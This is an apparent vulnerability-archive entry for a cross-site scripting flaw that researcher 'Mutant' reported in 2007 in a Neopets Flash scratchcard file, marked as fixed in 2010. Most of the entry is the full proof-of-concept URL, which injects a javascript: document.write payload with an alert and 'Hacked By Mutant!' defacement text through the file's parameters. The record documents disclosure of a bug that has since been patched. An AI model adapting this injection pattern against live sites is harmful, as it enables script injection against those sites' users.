| 
 
| Security researcher Mutant, has submitted on 21/09/2007 a cross-site-scripting (XSS) vulnerability affecting images.neopets.com, which at the time of submission ranked 155 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 28/09/2007. It is currently fixed.
 |  
              | Date submitted: 21/09/2007 | Date published: 28/09/2007 | Date fixed: 13/07/2010 | Status:  FIXED |  
| Author: Mutant | Domain: images.neopets.com | Category: XSS | Pagerank: 155 | 
|---|
 
 
| URL: http://images.neopets.com/scratchcard_v23.swf?joe=bob&random=392785&matchesNeededToWin=3&zonesScratc hableMax=6&startText=%3Cfont+color%3D%22%23000000%22%3EScratch+off+6+boxes+to+see+XSS%21%3C%2Ffont%3
 E&loadingText=&bgSWFURL=http://images.neopets.com/desert/desert_sc/sc_bg_sco.swf&endText=%3Cfont+col
 or%3D%22%23009999%22%3EClick+below+to+see+XSS.%21%3C%2Ffont%3E&buttonText=%3Cfont+color%3D%22%230099
 99%22%3EClick+Here+To+See+XSS%21%3C%2Ffont%3E&buttonURL=javascript:document.write("<script>alert('j0
 0 g0t 0wn3d!')</script><p align=center><h1>Hacked By
 Mutant!");&scratchSWFURL1=desert_item3_v1_mc&scratchSWFURL2=desert_item4_v1_mc&scratchSWFURL3=desert
 _item5_v1_mc&scratchSWFURL4=desert_item6_v1_mc&scratchSWFURL5=desert_item6_v1_mc&scratchSWFURL6=dese
 rt_item8_v1_mc&scratchSWFURL7=desert_item9_v1_mc&scratchSWFURL8=desert_item10_v1_mc&scratchSWFURL9=d
 esert_item11_v1_mc&winner=1&lang=en&forceStartText=%3Cbr%3E%3Ca+href%3D%22asfunction%3AforceStart%22
 %3E-+Click+Here+to+Start+-%3C%2Fa%3E&beginEachScratchURL=http%3A%2F%2Fwww.neopets.com%2Fdesert%2Fsc%
 2Fscratch_update.phtml%3Fcard_level%3D1%26username%3Dnonespecified',%20'flash_97505124257',%20'550',
 %20'400',%20'6',%20'#FFFFFF
 |  
| Click here to view the mirror |  
|  |  |